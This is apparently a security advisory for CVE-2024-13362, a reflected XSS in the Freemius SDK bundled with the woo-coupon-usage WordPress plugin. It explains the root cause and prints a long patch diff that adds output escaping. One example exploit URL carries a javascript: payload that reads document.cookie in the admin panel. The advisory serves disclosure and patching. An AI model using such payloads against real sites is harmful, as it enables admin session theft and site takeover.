Atomic Edge analysis of CVE-2024-13362: A reflected DOM-based Cross-Site Scripting (XSS) vulnerability exists in the Freemius SDK library, version 2.10.1 and earlier, which is bundled with multiple WordPress plugins and themes. An unauthenticated attacker can inject arbitrary web scripts via the ‘url’ parameter. This vulnerability requires user interaction, such as clicking a crafted link. The CVSS score is 6.1 (Medium).
The root cause is insufficient input sanitization and output escaping in the Freemius SDK’s handling of the ‘trial_promotion_message’ filter. In the vulnerable file `woo-coupon-usage/freemius/includes/class-freemius.php`, around line 24000, the code constructs an admin notice message by directly concatenating a user-supplied URL with HTML markup. The `$trial_url` variable is passed into a `sprintf` format string without escaping the URL context. The `$this->apply_filters( ‘trial_promotion_message’, …)` call then passes this unsanitized HTML to the `_admin_notices->add_sticky()` method, which injects it into the DOM. The fix ensures the entire message block, including the button, is wrapped in a `
` container and that the URL output is properly escaped via `esc_url()` before being rendered.
An attacker can craft a malicious URL that, when visited by a logged-in administrator, injects JavaScript into the WordPress admin dashboard. The payload is embedded in the `url` parameter that is processed by the Freemius trial promotion notice. For example, a link pointing to `https://target.com/wp-admin/admin.php?page=wcusage_…&url=javascript:alert(document.cookie)` would cause the Freemius SDK to render a sticky admin notice containing the attacker’s script. The script executes in the context of the admin page, giving the attacker access to session cookies and administrative functions.
The patch modifies the code to properly escape the URL before it is inserted into the HTML. In the patched version, the `$trial_url` is passed through `esc_url()` within the `sprintf()` call. Additionally, the HTML structure is refactored to use a `
` wrapper, which helps contain the script context and prevents DOM clobbering. This change ensures that any injected `url` parameter values are safely encoded as text, not executed as code.
If exploited, this vulnerability allows an attacker to execute arbitrary JavaScript in the context of the victim’s WordPress admin session. This can lead to session hijacking, credential theft, forced administrative actions (e.g., adding new admin users), and complete compromise of the WordPress site. The attack does not require authentication for the initial exploitation, only the victim to be logged in as an admin when clicking the malicious link.
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
Code Diff
--- a/woo-coupon-usage/freemius/includes/class-freemius.php
+++ b/woo-coupon-usage/freemius/includes/class-freemius.php
@@ -24000,13 +24000,15 @@
// Start trial button.
$button = ' ' . sprintf(
- '<a style="margin-left: 10px; vertical-align: super;" href="%s"><button class="button button-primary">%s ➜</button></a>',
+ '<div><a class="button button-primary" href="%s">%s ➜</a></div>',
$trial_url,
$this->get_text_x_inline( 'Start free trial', 'call to action', 'start-free-trial' )
);
+ $message_text = $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string}" );
+
$this->_admin_notices->add_sticky(
- $this->apply_filters( 'trial_promotion_message', "{$message} {$cc_string} {$button}" ),
+ "<div class="fs-trial-message-container"><div>{$message_text}</div> {$button}</div>",
'trial_promotion',
'',
'promotion'
@@ -25476,7 +25478,7 @@
$img_dir = WP_FS__DIR_IMG;
// Locate the main assets folder.
- if ( 1 < count( $fs_active_plugins->plugins ) ) {
+ if ( ! empty( $fs_active_plugins->plugins ) ) {
$plugin_or_theme_img_dir = ( $this->is_plugin() ? WP_PLUGIN_DIR : get_theme_root( get_stylesheet() ) );
foreach ( $fs_active_plugins->plugins as $sdk_path => &$data ) {
--- a/woo-coupon-usage/freemius/includes/class-fs-plugin-updater.php
+++ b/woo-coupon-usage/freemius/includes/class-fs-plugin-updater.php
@@ -542,24 +542,8 @@
global $wp_current_filter;
- $current_plugin_version = $this->_fs->get_plugin_version();
-
- if ( ! empty( $wp_current_filter ) && 'upgrader_process_complete' === $wp_current_filter[0] ) {
- if (
- is_null( $this->_update_details ) ||
- ( is_object( $this->_update_details ) && $this->_update_details->new_version !== $current_plugin_version )
- ) {
- /**
- * After an update, clear the stored update details and reparse the plugin's main file in order to get
- * the updated version's information and prevent the previous update information from showing up on the
- * updates page.
- *
- * @author Leo Fajardo (@leorw)
- * @since 2.3.1
- */
- $this->_update_details = null;
- $current_plugin_version = $this->_fs->get_plugin_version( true );
- }
+ if ( ! empty( $wp_current_filter ) && in_array( 'upgrader_process_complete', $wp_current_filter ) ) {
+ return $transient_data;
}
if ( ! isset( $this->_update_details ) ) {
@@ -568,7 +552,7 @@
false,
fs_request_get_bool( 'force-check' ),
FS_Plugin_Updater::UPDATES_CHECK_CACHE_EXPIRATION,
- $current_plugin_version
+ $this->_fs->get_plugin_version()
);
$this->_update_details = false;
--- a/woo-coupon-usage/freemius/includes/entities/class-fs-plugin-plan.php
+++ b/woo-coupon-usage/freemius/includes/entities/class-fs-plugin-plan.php
@@ -13,7 +13,6 @@
/**
* Class FS_Plugin_Plan
*
- * @property FS_Pricing[] $pricing
*/
class FS_Plugin_Plan extends FS_Entity {
--- a/woo-coupon-usage/freemius/includes/entities/class-fs-site.php
+++ b/woo-coupon-usage/freemius/includes/entities/class-fs-site.php
@@ -10,16 +10,16 @@
exit;
}
- /**
- * @property int $blog_id
- */
- #[AllowDynamicProperties]
class FS_Site extends FS_Scope_Entity {
/**
* @var number
*/
public $site_id;
/**
+ * @var int
+ */
+ public $blog_id;
+ /**
* @var number
*/
public $plugin_id;
--- a/woo-coupon-usage/freemius/includes/entities/class-fs-user.php
+++ b/woo-coupon-usage/freemius/includes/entities/class-fs-user.php
@@ -48,6 +48,19 @@
parent::__construct( $user );
}
+ /**
+ * This method removes the deprecated 'is_beta' property from the serialized data.
+ * Should clean up the serialized data to avoid PHP 8.2 warning on next execution.
+ *
+ * @return void
+ */
+ function __wakeup() {
+ if ( property_exists( $this, 'is_beta' ) ) {
+ // If we enter here, and we are running PHP 8.2, we already had the warning. But we sanitize data for next execution.
+ unset( $this->is_beta );
+ }
+ }
+
function get_name() {
return trim( ucfirst( trim( is_string( $this->first ) ? $this->first : '' ) ) . ' ' . ucfirst( trim( is_string( $this->last ) ? $this->last : '' ) ) );
}
--- a/woo-coupon-usage/freemius/includes/managers/class-fs-admin-menu-manager.php
+++ b/woo-coupon-usage/freemius/includes/managers/class-fs-admin-menu-manager.php
@@ -699,16 +699,36 @@
$menu = $this->find_main_submenu();
}
+ $menu_slug = $menu['menu'][2];
$parent_slug = isset( $menu['parent_slug'] ) ?
- $menu['parent_slug'] :
- 'admin.php';
+ $menu['parent_slug'] :
+ 'admin.php';
- return admin_url(
- $parent_slug .
- ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
- 'page=' .
- $menu['menu'][2]
- );
+ if ( fs_apply_filter( $this->_module_unique_affix, 'enable_cpt_advanced_menu_logic', false ) ) {
+ $parent_slug = 'admin.php';
+
+ /**
+ * This line and the `if` block below it are based on the `menu_page_url()` function of WordPress.
+ *
+ * @author Leo Fajardo (@leorw)
+ * @since 2.10.2
+ */
+ global $_parent_pages;
+
+ if ( ! empty( $_parent_pages[ $menu_slug ] ) ) {
+ $_parent_slug = $_parent_pages[ $menu_slug ];
+ $parent_slug = isset( $_parent_pages[ $_parent_slug ] ) ?
+ $parent_slug :
+ $menu['parent_slug'];
+ }
+ }
+
+ return admin_url(
+ $parent_slug .
+ ( false === strpos( $parent_slug, '?' ) ? '?' : '&' ) .
+ 'page=' .
+ $menu_slug
+ );
}
/**
--- a/woo-coupon-usage/freemius/includes/managers/class-fs-admin-notice-manager.php
+++ b/woo-coupon-usage/freemius/includes/managers/class-fs-admin-notice-manager.php
@@ -194,8 +194,14 @@
* @since 1.0.7
*/
static function _add_sticky_dismiss_javascript() {
+ $sticky_admin_notice_js_template_name = 'sticky-admin-notice-js.php';
+
+ if ( ! file_exists( fs_get_template_path( $sticky_admin_notice_js_template_name ) ) ) {
+ return;
+ }
+
$params = array();
- fs_require_once_template( 'sticky-admin-notice-js.php', $params );
+ fs_require_once_template( $sticky_admin_notice_js_template_name, $params );
}
private static $_added_sticky_javascript = false;
--- a/woo-coupon-usage/freemius/start.php
+++ b/woo-coupon-usage/freemius/start.php
@@ -15,7 +15,7 @@
*
* @var string
*/
- $this_sdk_version = '2.10.1';
+ $this_sdk_version = '2.11.0';
#region SDK Selection Logic --------------------------------------------------------------------
--- a/woo-coupon-usage/inc/admin/admin-affiliate-users.php
+++ b/woo-coupon-usage/inc/admin/admin-affiliate-users.php
@@ -165,7 +165,11 @@
if ($user_info) {
// Get current page after /wp-admin/ without parameters
- $current_page = sanitize_text_field($_GET['page']);
+ if(isset($_GET['page'])) {
+ $current_page = sanitize_text_field($_GET['page']);
+ } else {
+ $current_page = '';
+ }
$unlink_url = add_query_arg(
array(
'action' => 'wcusage_unlink_affiliate',
--- a/woo-coupon-usage/inc/admin/admin-dashboard.php
+++ b/woo-coupon-usage/inc/admin/admin-dashboard.php
@@ -411,6 +411,9 @@
$name = $user->user_login;
}
}
+ if(!$name || $name == "" || $name == " ") {
+ $name = $user->user_login;
+ }
?>
<tr class="wcusage-admin-table-col-row">
<td><a href="<?php echo esc_url(get_edit_user_link($user_id)); ?>" title="<?php echo esc_html($user->user_login); ?>" target="_blank"><?php echo esc_html($name); ?></a></td>
--- a/woo-coupon-usage/inc/admin/admin-orders-box.php
+++ b/woo-coupon-usage/inc/admin/admin-orders-box.php
@@ -3,30 +3,27 @@
if ( !defined( 'ABSPATH' ) ) {
exit;
}
-if ( !class_exists( 'SitePress' ) ) {
- // Temp fix for WPML conflict
- function wcusage_add_custom_box() {
- if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
- $screen = wc_get_page_screen_id( 'shop-order' );
- } else {
- $screen = 'shop_order';
- }
- add_meta_box(
- 'wcusage_affiliate_info',
- // Unique ID
- 'Coupon Affiliate',
- // Box title
- 'wcusage_custom_box_html',
- // Content callback, must be of type callable
- $screen,
- // Post type
- 'side',
- 'high'
- );
+function wcusage_add_custom_box() {
+ if ( class_exists( AutomatticWooCommerceUtilitiesFeaturesUtil::class ) ) {
+ $screen = wc_get_page_screen_id( 'shop-order' );
+ } else {
+ $screen = 'shop_order';
}
-
- add_action( 'add_meta_boxes', 'wcusage_add_custom_box' );
+ add_meta_box(
+ 'wcusage_affiliate_info',
+ // Unique ID
+ 'Coupon Affiliate',
+ // Box title
+ 'wcusage_custom_box_html',
+ // Content callback, must be of type callable
+ $screen,
+ // Post type
+ 'side',
+ 'high'
+ );
}
+
+add_action( 'add_meta_boxes', 'wcusage_add_custom_box' );
// Display the metabox content
function wcusage_custom_box_html( $post ) {
$options = get_option( 'wcusage_options' );
@@ -44,7 +41,7 @@
}
$order = wc_get_order( $post_id );
if ( $order ) {
- if ( $wcusage_show_column_code && !class_exists( 'SitePress' ) ) {
+ if ( $wcusage_show_column_code ) {
$affiliate = array();
$coupon_codes = array();
$lifetimeaffiliate = wcusage_order_meta( $post_id, 'lifetime_affiliate_coupon_referrer' );
@@ -173,12 +170,21 @@
echo '<strong>(' . esc_html__( 'Custom / URL Referral', 'woo-coupon-usage' ) . ')</strong><br/>';
}
$ispaid = "";
- // Message
- echo 'Referral Code: ' . esc_html( $coupon_code ) . '<br/>';
- echo wp_kses_post( $getinfo['affililiateusertext'] );
+ // Show the coupon code
+ if ( isset( $coupon_id ) && $coupon_id ) {
+ echo 'Referral Code: <a href="' . esc_url( admin_url( 'post.php?post=' . esc_attr( $coupon_id ) . '&action=edit' ) ) . '" target="_blank" style="color: #07bbe3;">' . esc_html( $coupon_code ) . '</a><br/>';
+ }
+ // Show the affiliate user
+ $wcusage_affiliate_user = wcusage_order_meta( $order_id, 'wcusage_affiliate_user' );
+ if ( $wcusage_affiliate_user ) {
+ $affiliate = get_user_by( 'ID', $wcusage_affiliate_user );
+ $affiliate_username = $affiliate->user_login;
+ echo esc_html__( 'Affiliate User', 'woo-coupon-usage' ) . ": <a href='" . esc_url( admin_url( "user-edit.php?user_id=" . $wcusage_affiliate_user ) ) . "' target='_blank' style='color: #07bbe3;'>" . esc_html( $affiliate_username ) . "</a><br/>";
+ }
if ( $order->get_status() != "refunded" && !wcusage_coupon_disable_commission( $coupon_id ) ) {
echo esc_html__( 'Commission', 'woo-coupon-usage' ) . ": " . wp_kses_post( $getinfo['thecommission'] ) . wp_kses_post( $ispaid ) . "<br/>";
}
+ // Show the affiliate dashboard link
echo "<a href='" . esc_url( $getinfo['uniqueurl'] ) . "' target='_blank' style='color: #07bbe3;' title='" . esc_html__( 'View the affiliate dashboard for this affiliate coupon.', 'woo-coupon-usage' ) . "'>" . esc_html__( 'View Dashboard', 'woo-coupon-usage' ) . "</a>";
echo "</p>";
$wcusage_field_mla_enable = wcusage_get_setting_value( 'wcusage_field_mla_enable', '0' );
--- a/woo-coupon-usage/inc/admin/admin-tools.php
+++ b/woo-coupon-usage/inc/admin/admin-tools.php
@@ -8,10 +8,10 @@
<div class="wrap admin-tools" style="margin: 0;">
- <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
-
<div class="wrap">
+ <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
+
<h1>Coupon Affiliates - Admin Tools</h1>
<br/>
--- a/woo-coupon-usage/inc/admin/class-clicks-list-table.php
+++ b/woo-coupon-usage/inc/admin/class-clicks-list-table.php
@@ -37,11 +37,11 @@
if (isset($item[$column_name]) && $item[$column_name] != 0) {
$coupon_info = wcusage_get_coupon_info_by_id($item[$column_name]);
$uniqueurl = $coupon_info[4];
- return "<a href='" . $uniqueurl . "' target='_blank' title='" . __('View Affiliate Dashboard', 'woo-coupon-usage') . "'>"
+ return "<a href='" . esc_url($uniqueurl) . "' target='_blank' title='" . __('View Affiliate Dashboard', 'woo-coupon-usage') . "'>"
. get_the_title($item[$column_name])
- . "</a> <a href='" . admin_url('post.php?post=' . $item[$column_name] . '&action=edit&classic-editor') . "' target='_blank' title='" . __('Edit Coupon', 'woo-coupon-usage') . "'>"
+ . "</a> <a href='" . esc_url(admin_url('post.php?post=' . $item[$column_name] . '&action=edit&classic-editor')) . "' target='_blank' title='" . __('Edit Coupon', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-edit-page' style='font-size: 12px; margin-top: 5px; display: inline-block; width: 12px;'></span></a>"
- . "<a href='" . admin_url('admin.php?page=wcusage_clicks&coupon=' . get_the_title($item[$column_name])) . "' title='" . __('View all visits for this coupon.', 'woo-coupon-usage') . "'>"
+ . "<a href='" . esc_url(admin_url('admin.php?page=wcusage_clicks&coupon=' . get_the_title($item[$column_name]))) . "' title='" . __('View all visits for this coupon.', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-search' style='font-size: 12px; margin-top: 5px;'></span></a>";
} else {
return "";
@@ -49,14 +49,14 @@
case 'campaign':
if (!empty($item[$column_name])) {
return ucfirst($item[$column_name])
- . "<a href='" . admin_url('admin.php?page=wcusage_clicks&campaign=' . $item[$column_name]) . "' title='" . __('View all visits for this campaign name.', 'woo-coupon-usage') . "'>"
+ . "<a href='" . esc_url(admin_url('admin.php?page=wcusage_clicks&campaign=' . $item[$column_name])) . "' title='" . __('View all visits for this campaign name.', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-search' style='font-size: 12px; margin-top: 5px;'></span></a>";
} else {
return "---";
}
case 'page':
if(isset($item[$column_name])) {
- return "<a href='".get_permalink($item[$column_name])."' target='_blank' title='".__( 'View Landing Page', 'woo-coupon-usage' )."'>"
+ return "<a href='".esc_url(get_permalink($item[$column_name]))."' target='_blank' title='".__( 'View Landing Page', 'woo-coupon-usage' )."'>"
. get_the_title($item[$column_name]) . "</a>";
} else {
return "";
@@ -64,7 +64,7 @@
case 'referrer':
if (!empty($item[$column_name])) {
return $item[$column_name]
- . "<a href='".admin_url('admin.php?page=wcusage_clicks&referrer=' . $item[$column_name])."' title='" . __('View all visits for this referrer.', 'woo-coupon-usage') . "'>"
+ . "<a href='".esc_url(admin_url('admin.php?page=wcusage_clicks&referrer=' . $item[$column_name]))."' title='" . __('View all visits for this referrer.', 'woo-coupon-usage') . "'>"
. "<span class='dashicons dashicons-search' style='font-size: 12px; margin-top: 5px;'></span></a>";
} else {
return "";
--- a/woo-coupon-usage/inc/admin/class-coupon-users-table.php
+++ b/woo-coupon-usage/inc/admin/class-coupon-users-table.php
@@ -263,7 +263,7 @@
$coupons = wcusage_get_users_coupons_ids( $user_id );
switch ( $column_name ) {
case 'ID':
- return '<a href="' . admin_url( 'user-edit.php?user_id=' . $user_id ) . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $item[ $column_name ] . '</a>';
+ return '<a href="' . esc_url(admin_url( 'user-edit.php?user_id=' . $user_id )) . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $item[ $column_name ] . '</a>';
case 'Username':
return wcusage_output_affiliate_tooltip_user_info($user_id);
case 'roles':
@@ -382,7 +382,7 @@
<style>@media screen and (min-width: 782px) { .wcusage_users_page_desc { margin-bottom: -40px; } }</style>
<div class="wrap wcusage_users_page_header">
- <h2 class="wcusage-admin-title">
+ <h2 class="wp-heading-inline wcusage-admin-title">
<?php echo esc_html__('Coupon Affiliate Users', 'woo-coupon-usage'); ?>
<span class="wcusage-admin-title-buttons">
<a href="<?php echo esc_url(admin_url('admin.php?page=wcusage_add_affiliate')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Add New Affiliate</a>
--- a/woo-coupon-usage/inc/admin/class-coupons-table.php
+++ b/woo-coupon-usage/inc/admin/class-coupons-table.php
@@ -136,12 +136,11 @@
switch ($column_name) {
case 'ID':
- // return '<a href="' . admin_url('post.php?post=' . $item[$column_name] . '&action=edit') . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $item[$column_name] . '</a>';
$coupon_id = $item->ID;
- return '<a href="' . admin_url('post.php?post=' . $coupon_id . '&action=edit') . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . $coupon_id . '</a>';
+ return '<a href="' . esc_url(admin_url('post.php?post=' . $coupon_id . '&action=edit')) . '"><span class="dashicons dashicons-edit" style="font-size: 15px; margin-top: 4px;"></span> ' . esc_html($coupon_id) . '</a>';
case 'post_title':
$coupon_id = $item->ID;
- return '<a href="' . admin_url('post.php?post=' . $coupon_id . '&action=edit') . '">' . $coupon_code . '</a>';
+ return '<a href="' . esc_url(admin_url('post.php?post=' . $coupon_id . '&action=edit')) . '">' . esc_html($coupon_code) . '</a>';
case 'coupon_type':
$coupon_type = get_post_meta($item->ID, 'discount_type', true);
if(!$coupon_type) {
@@ -154,31 +153,31 @@
}
if($coupon_type == 'percent') {
if($coupon_amount) {
- return esc_html__('Percentage Discount', 'woo-coupon-usage') . ' (' . $coupon_amount . '%)';
+ return esc_html__('Percentage Discount', 'woo-coupon-usage') . ' (' . esc_html($coupon_amount) . '%)';
} else {
return esc_html__('Percentage Discount', 'woo-coupon-usage');
}
} elseif($coupon_type == 'fixed_cart') {
if($coupon_amount) {
- return esc_html__('Fixed Cart Discount', 'woo-coupon-usage') . ' (' . wc_price($coupon_amount) . ')';
+ return esc_html__('Fixed Cart Discount', 'woo-coupon-usage') . ' (' . wc_price(esc_html($coupon_amount)) . ')';
} else {
return esc_html__('Fixed Cart Discount', 'woo-coupon-usage');
}
} elseif($coupon_type == 'fixed_product') {
if($coupon_amount) {
- return esc_html__('Fixed Product Discount', 'woo-coupon-usage') . ' (' . wc_price($coupon_amount) . ')';
+ return esc_html__('Fixed Product Discount', 'woo-coupon-usage') . ' (' . wc_price(esc_html($coupon_amount)) . ')';
} else {
return esc_html__('Fixed Product Discount', 'woo-coupon-usage');
}
} elseif($coupon_type == 'percent_product') {
if($coupon_amount) {
- return esc_html__('Percentage Product Discount', 'woo-coupon-usage') . ' (' . $coupon_amount . '%)';
+ return esc_html__('Percentage Product Discount', 'woo-coupon-usage') . ' (' . esc_html($coupon_amount) . '%)';
} else {
return esc_html__('Percentage Product Discount', 'woo-coupon-usage');
}
}
if($coupon_amount) {
- return $coupon_type . ' (' . $coupon_amount . ')';
+ return $coupon_type . ' (' . esc_html($coupon_amount) . ')';
} else {
return $coupon_type;
}
@@ -199,7 +198,7 @@
}
}
if($usage > 0 && !$sales) {
- return "<span title='".$qmessage."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
+ return "<span title='".esc_html($qmessage)."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
}
return wcusage_format_price($sales);
case 'commission':
@@ -217,7 +216,7 @@
}
}
if($usage > 0 && !$total_commission) {
- return "<span title='".$qmessage."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
+ return "<span title='".esc_html($qmessage)."'><strong><i class='fa-solid fa-ellipsis'></i></strong></span></a>";
}
return wcusage_format_price($total_commission);
case 'unpaid_commission':
@@ -236,7 +235,7 @@
if($user_info) {
$username = $user_info->user_login;
$userlink = get_edit_user_link($coupon_user_id);
- $usernametext = '<a href="'.$userlink.'" target="_blank">' . $username . '</a>';
+ $usernametext = '<a href="'.$userlink.'" target="_blank">' . esc_html($username) . '</a>';
} else {
$usernametext = "-";
}
@@ -244,25 +243,52 @@
case 'dashboard_link':
$coupon_info = wcusage_get_coupon_info_by_id($item->ID);
$dashboard_link = $coupon_info[4];
- return '<a href="' . $dashboard_link . '" target="_blank">'.esc_html__('View Dashboard', 'woo-coupon-usage').' <span class="dashicons dashicons-external"></span></a>';
+ return '<a href="' . esc_url($dashboard_link) . '" target="_blank">'.esc_html__('View Dashboard', 'woo-coupon-usage').' <span class="dashicons dashicons-external"></span></a>';
case 'referral_link':
$home_page = get_home_url();
$user_info = get_userdata($coupon_user_id);
$link = $home_page.'?' . $wcusage_urls_prefix . '='.esc_html($coupon_code);
return '<div class="wcusage-copyable-link">'
- . '<input type="text" id="wcusageLink'.$coupon_code.'" class="wcusage-copy-link-text" value="'.$link.'" title="'.$link.'"
+ . '<input type="text" id="wcusageLink'.esc_attr($coupon_code).'" class="wcusage-copy-link-text" value="'.esc_url($link).'" title="'.esc_url($link).'"
style="max-width: 100px;width: 75%;max-height: 24px;min-height: 24px;font-size: 10px;" readonly>'
. '<button type="button" class="wcusage-copy-link-button" style="max-height: 20px;min-height: 20px;background: none;border: none;"
title="'.esc_html__( 'Copy Link', 'woo-coupon-usage' ).'"><i class="fa-regular fa-copy"></i></button>'
. '</div>';
case 'the-actions':
+ $allowed_html = array(
+ 'a' => array(
+ 'href' => array(),
+ 'title' => array(),
+ 'onclick' => array(),
+ 'style' => array(),
+ 'class' => array()
+ ),
+ 'span' => array(
+ 'class' => array()
+ )
+ );
// Delete
+ // Create actions.
$actions = array(
- 'edit' => sprintf('<a href="%s">%s</a>', admin_url('post.php?post=' . $item->ID . '&action=edit'), esc_html__('Edit', 'woo-coupon-usage')),
- 'delete' => sprintf('<a href="%s" style="color: #7a0707;" onclick="return confirm('%s');">%s</a>', wp_nonce_url(admin_url('admin.php?page=wcusage_coupons&delete_coupon=' . $item->ID), 'delete_coupon'), esc_html__('Are you sure you want to delete this coupon?', 'woo-coupon-usage'), esc_html__('Delete', 'woo-coupon-usage'))
+ 'edit' => sprintf(
+ '<a href="%s">%s</a>',
+ esc_url( admin_url( 'post.php?post=' . $item->ID . '&action=edit' ) ),
+ esc_html__( 'Edit', 'woo-coupon-usage' )
+ ),
+ 'delete' => sprintf(
+ '<a href="%s" onclick="return confirm('%s');" style="color: #7a0707;">%s</a>',
+ esc_url(
+ wp_nonce_url(
+ admin_url( 'admin.php?page=wcusage_coupons&delete_coupon=' . $item->ID ),
+ 'delete_coupon'
+ )
+ ),
+ esc_html__( 'Are you sure you want to delete this coupon?', 'woo-coupon-usage' ),
+ esc_html__( 'Delete', 'woo-coupon-usage' )
+ ),
);
foreach ($actions as $key => $action) {
- $actions[$key] = '<span class="' . $key . '">' . $action . '</span>';
+ $actions[$key] = '<span class="' . esc_attr($key) . '">' . wp_kses($action, $allowed_html) . '</span>';
}
return implode(' | ', $actions);
default:
@@ -335,7 +361,8 @@
$coupon_name = $coupon->post_title;
wp_delete_post($coupon_id);
$message = esc_html__('Coupon "'.$coupon_name.'" deleted successfully.', 'woo-coupon-usage');
- echo '<p style="font-weight: bold; color: green;">' . esc_html($message) . '</p>';
+ echo '<p class="notice notice-success is-dismissible" style="padding: 10px; margin: 10px 0;"
+ style="font-weight: bold; color: green;">' . esc_html($message) . '</p>';
}
}
}
@@ -349,10 +376,10 @@
$page_url_without_affiliate_only = remove_query_arg('affiliate_only', $page_url);
?>
<link rel="stylesheet" href="<?php echo esc_url(WCUSAGE_UNIQUE_PLUGIN_URL) .'fonts/font-awesome/css/all.min.css'; ?>" crossorigin="anonymous">
- <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap">
+ <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
<form method="get">
- <h1 class="wcusage-admin-title wcusage-admin-title-coupons">
+ <h1 class="wp-heading-inline wcusage-admin-title wcusage-admin-title-coupons">
<?php echo esc_html__('Coupons', 'woo-coupon-usage'); ?>
<span class="wcusage-admin-title-buttons">
<a href="<?php echo esc_url(admin_url('post-new.php?post_type=shop_coupon')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Add Coupon</a>
@@ -361,7 +388,7 @@
<a href="<?php echo esc_url(admin_url('admin.php?page=wcusage-bulk-edit-coupon')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Bulk Edit Coupons</a>
</span>
<br/>
- <span class="wcusage-admin-title-filters">
+ <span class="wcusage-admin-title-filters" style="margin-bottom: 10px;">
<input type="hidden" name="page" value="<?php echo esc_html($_REQUEST['page']); ?>" />
<input type="checkbox" name="affiliate_only" value="true" <?php echo $affiliate_only ? 'checked' : ''; ?> onchange="this.form.submit();">
<?php echo esc_html__('Show Affiliate Coupons Only', 'woo-coupon-usage'); ?>
--- a/woo-coupon-usage/inc/admin/class-referrals-table.php
+++ b/woo-coupon-usage/inc/admin/class-referrals-table.php
@@ -257,15 +257,15 @@
}
</style>
<link rel="stylesheet" href="<?php echo esc_url(WCUSAGE_UNIQUE_PLUGIN_URL) .'fonts/font-awesome/css/all.min.css'; ?>" crossorigin="anonymous">
- <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
<div class="wrap">
- <h2 class="wcusage-admin-title" style="margin-bottom: -15px;">
+ <?php echo do_action( 'wcusage_hook_dashboard_page_header', ''); ?>
+ <h1 class="wcusage-admin-title" style="margin-bottom: -15px;">
<?php echo esc_html__('Affiliate Orders (Referrals)', 'woo-coupon-usage'); ?>
<span class="wcusage-admin-title-buttons">
<a href="<?php echo esc_url(('post-new.php?post_type=shop_order')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Add New Order</a>
<a href="<?php echo esc_url(admin_url('admin.php?page=wcusage-bulk-assign-coupons')); ?>" class="wcusage-settings-button" id="wcu-admin-create-registration-link">Assign Orders to Affiliates</a>
</span>
- </h2>
+ </h1>
<br/>
<?php
echo '<form id="referrals-table" method="GET">';
--- a/woo-coupon-usage/inc/admin/settings/admin-options.php
+++ b/woo-coupon-usage/inc/admin/settings/admin-options.php
@@ -832,7 +832,7 @@
?>
<!-- Generate Settings Page Area -->
- <form class="wcusage-settings-form" action="options.php" method="post" style="margin-top: 10px; <?php
+ <form class="wcusage_row_setting wcusage-settings-form" action="options.php" method="post" style="margin-top: 10px; <?php
if ( wcu_fs()->can_use_premium_code() ) {
?>width: 97.5%;<?php
}
@@ -862,7 +862,7 @@
'0px'
);
?>
- <i><?php
+ <i style="margin-top: -5px;"><?php
echo esc_html__( 'This will disable automatic ajax saving, and instead will enable the "Save Settings" button, and you will save all settings at once.', 'woo-coupon-usage' );
?></i>
<br/><br/>
--- a/woo-coupon-usage/inc/admin/settings/options-commission.php
+++ b/woo-coupon-usage/inc/admin/settings/options-commission.php
@@ -21,16 +21,6 @@
<?php echo wcusage_setting_toggle_option('wcusage_field_show_commission', 1, esc_html__( 'Enable Commission Calculations & Statistics', 'woo-coupon-usage' ), '0px'); ?>
<i><?php echo esc_html__( 'When enabled, commission will be calculated and displayed on the affiliate dashboard.', 'woo-coupon-usage' ); ?></i>
- <br/><br/>
-
- <!-- Enable commission calculation statistics -->
- <?php echo wcusage_setting_toggle_option('wcusage_field_commission_disable_non_affiliate', 0, esc_html__( 'Hide commission statistics for non-affiliate coupons.', 'woo-coupon-usage' ), '0px'); ?>
- <i><?php echo esc_html__( 'When enabled, commission statistics are disabled/hidden for coupons that are not assigned to an affiliate user.', 'woo-coupon-usage' ); ?></i>
- <?php if( wcu_fs()->can_use_premium_code() ) { ?>
- <br/>
- <i><?php echo esc_html__( '(PRO) This will also stop "unpaid commission" from being added to non-affiliate coupons.', 'woo-coupon-usage' ); ?></i>
- <?php } ?>
-
<br/><br/><hr/>
<!-- ********** Commission Amounts ********** -->
@@ -148,8 +138,6 @@
<i><?php echo esc_html__( 'Optional: How many days after being assigned as a "lifetime" referral should it expire, and the customer be unlinked from the customer.', 'woo-coupon-usage' ); ?></i><br/>
<i><?php echo esc_html__( 'Set to "0" for permanent lifetime commission with no expiry time.', 'woo-coupon-usage' ); ?> <?php echo esc_html__( 'Can also be set on a per-coupon basis.', 'woo-coupon-usage' ); ?></i><br/>
- <br/>
-
</span>
<!-- Per User Role -->
@@ -195,6 +183,26 @@
</span>
+ <div style="clear: both;"></div>
+
+ <br/><hr/>
+
+ <h3><span class="dashicons dashicons-admin-generic" style="margin-top: 2px;"></span> <?php echo esc_html__( 'Non-Affiliate Coupon Settings', 'woo-coupon-usage' ); ?>:</h3>
+
+ <!-- Disable commission statistics for non-affiliate coupons. -->
+ <?php echo wcusage_setting_toggle_option('wcusage_field_commission_disable_non_affiliate', 0, esc_html__( 'Hide commission statistics for non-affiliate coupons.', 'woo-coupon-usage' ), '0px'); ?>
+ <i><?php echo esc_html__( 'When enabled, commission statistics are disabled/hidden for coupons that are not assigned to an affiliate user.', 'woo-coupon-usage' ); ?></i>
+
